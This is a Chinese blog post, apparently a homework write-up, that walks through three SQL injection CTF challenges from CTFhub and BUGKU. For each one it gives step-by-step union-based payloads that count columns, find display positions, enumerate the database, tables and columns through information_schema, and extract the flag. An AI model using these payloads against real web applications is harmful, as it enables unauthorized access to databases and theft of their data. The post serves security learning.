周五的SQL注入作业

最新推荐文章于 2024-04-19 20:49:57 发布
最新推荐文章于 2024-04-19 20:49:57 发布
阅读量331 收藏 2
点赞数
分类专栏: 作业 文章标签: 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/128160251
版权

一.CTFhub整数型注入

思路:库名 —> 表名 —> 字段名 —> 字段对应的内容

(此题详细记录,后两题直接上手)

题目提示为整数型注入

我们先输入1,回显正常

 输入1',报错

 接下来开始操作                                                                                                                               第一步:首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

输入1 order by 2#时有回显,order by 3#时无回显,说明有两列

 第二步:爆出显示位。就是看看表格里面那一列是在页面显示的。注意将前面的参数值置换为空。可以看到是第二列里面的数据是显示在页面的。                                                                      输入 -1 union select 1,2#               回显位置为2

 

 第三步:获取当前数据名                                                                                                                   输入-1 union select 1,database()#         获取当前数据名sqli

 第四步: 爆表。information_schema.tables表示该数据库下的tables表,点表示下一级。where后面是条件,group_concat()是将查询到结果连接起来。该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是sqli的所有table_name的内容。

:获取sqli数据库下的所有表名,其中sqli前后需要加上单引号表示为字符串。sql语句中使用了单引号,为了避免单引号的使用,我们一般把字符转换成16进制编码。

输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#                              得到表flag,news

第五步:爆字段名。 

该语句的意思是查询information_schema数据库下的columns表里面且table_name字段内容是flag的所有column_name的内。注意table_name字段不是只存在于tables表,也是存在columns表中。表示所有字段对应的表名。

输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#                                    得到字段flag

 第六步:查询数据。       

输入-1 union select 1,flag from flag#获得flag

 

二.CTFhub字符型注入

思路:库名 —> 表名 —> 字段名 —> 字段对应的内容

题目提示为字符型注入

我们先输入1,回显'1'

 输入1'#注释它

接下来开始操作

第一步:首先知道表格有几列

输入1' order by 2#时有回显,1' order by 3#时无回显,说明有两列

 第二步:爆出显示位

输入-1'union select 1,2#        可以看到是第二列里面的数据是显示在页面的

 第三步:查库名

输入-1'union select 1,database()#     获取当前数据名sqli

第四步: 爆表

输入-1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#                  得到表名: flag,news

 第五步:爆字段名

输入-1'union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#                       得到字段:flag

第六步:查询数据

输入-1' union select 1,flag from flag#          得到flag

 

三.BUGKU成绩查询

思路:库名 —> 表名 —> 字段名 —> 字段对应的内容

输入1,2,3分别能查到1,2,3号学生的成绩;输入1'或1' --+返回异常,输入1' #返回正常,存在注入点。

 

 

接下来开始操作

第一步:首先知道表格有几列

输入1' order by 4#时有回显,1' order by 5#时无回显,说明有四列

第二步:爆出显示位 

输入-1'union select 1,2,3,4# 。可知有三个回显点

第三步:查库名 

输入-1'union select 1,2,database(),version() #   。获取当前数据名skctf

 第四步: 爆表

输入-1'union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf'#  。得到表名:fl4g,sc

 

第五步:爆字段名 

输入-1'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'# 。得到字段skctf_flag

第六步:查询数据 

输入-1' union select 1,2,3,skctf_flag from fl4g# 。得到flag

 

0e1G7
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入非常详细总结
热门推荐
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
SQL server 计算当前日期为一年中的第几周,以周五/周一作为一周中的第一天
qq_35124072的博客
01-25 4105
这个问题对于小白的我来说,当时找了好久才解决,所以在这里记录一下。 要计算当前日期为一年中的第几周,以周五作为一周中的第一天 首先设置每周的起始天为周五(因为默认是从周天开始的) SET DATEFIRST 5 SELECT DATEPART(WK,时间字段) as ‘一年内的第几周’ FROM 表名 在这里相当于用了两个函数才能实现以任意星期几来定义一周中第几天为一周中的第一天。 例: SET DATEFIRST 5 select 日期,datepart(wk,日期) as 一年内的第几周
NO.6 [SUCTF 2019]EasySQL
nigo134的博客
07-19 255
这道题目需要我们去对后端语句进行猜测 1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有|| 2、也就是select 输入的数据||内置的一个列名 from 表名=>即为 select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知) 此时的||起到的作用是or的作用 解法1 内置的sql语句为 sql=“select”.post[‘query’]."||flag from Flag"; 如果$p...
SQL语句查询每周起止日期(周日开始)
Mr_Dracy的博客
06-16 2999
SQL语句
SQL注入作业
最新发布
在这里,你可以了解到关于C++,数据结构,Linux等知识点
04-19 1218
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
初学SQL 注入之常见的几种注入类型
Just Do IT
12-21 3483
SQL注入原理 老生常谈,SQL注入攻击的本质就是把用户输入的参数当做SQL语句来执行,Web应用程序对用户输入数据的合法性没有判断和过滤,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。比如增删改查等,如果数据库的用户权限足够大,还可以对操作系统执行操作。 这里需要满足2个条件: 1.用户可以控制自己的输入 2.输入得参数可以被拼接成sql语句执行。 危害:造成信息泄露,上传webshell,篡改网页信息等。 SQL注入分类 0x00 联合注入 原理没什么好说的,最简单的一种注入方式,下面直接
SQL注入中的显示位
weixin_43379478的博客
12-10 3854
我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。所以如果我们想要知...
取某一年的周五SQLServer
tianlianchao1982的专栏
11-10 359
declare @d date ='2015-01-01'; declare @d2 date=dateadd(yy,1,@d); declare @t table(d date); set @d=dateadd(d,6-datepart(dw,@d),@d); while @d begin  insert into @t values(@d); set @d
sql 取所有周五的时间
sunshinegeorge的专栏
09-10 2969
select to_char(t.d,YYYY-MM-DD) as week from (  select trunc(to_date(2006-01-01,yyyy-mm-dd), MM)+rownum-1 as d  from espc_mms_rpt  ) t  where  trim(to_char(t.d, Day)) = 星期五 
SQL查询本年单月单周的星期五
风情路96号
03-22 765
  /*本年度所有的单月单周的星期五*/    create table friday  (  fyear int,  fmonth int,  fday int,  fweek int  )  declare @fri datetime  set @fri=01/01/2005  --置初值  while datepart(weekday,@fri)  begin      set @fri
网络攻防作业4——SQL注入
木子一个Lee的博客
10-08 376
【代码】网络攻防作业4——SQL注入
基础题目之SQL注入
king丶
07-31 1716
http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')--%20 这样执行一个结果,你会发现-- 没有起到注释的作用 说明这个地方不能使用空格 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')# //#经过url编码变成%23 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')%23 发现返回
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQLSQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值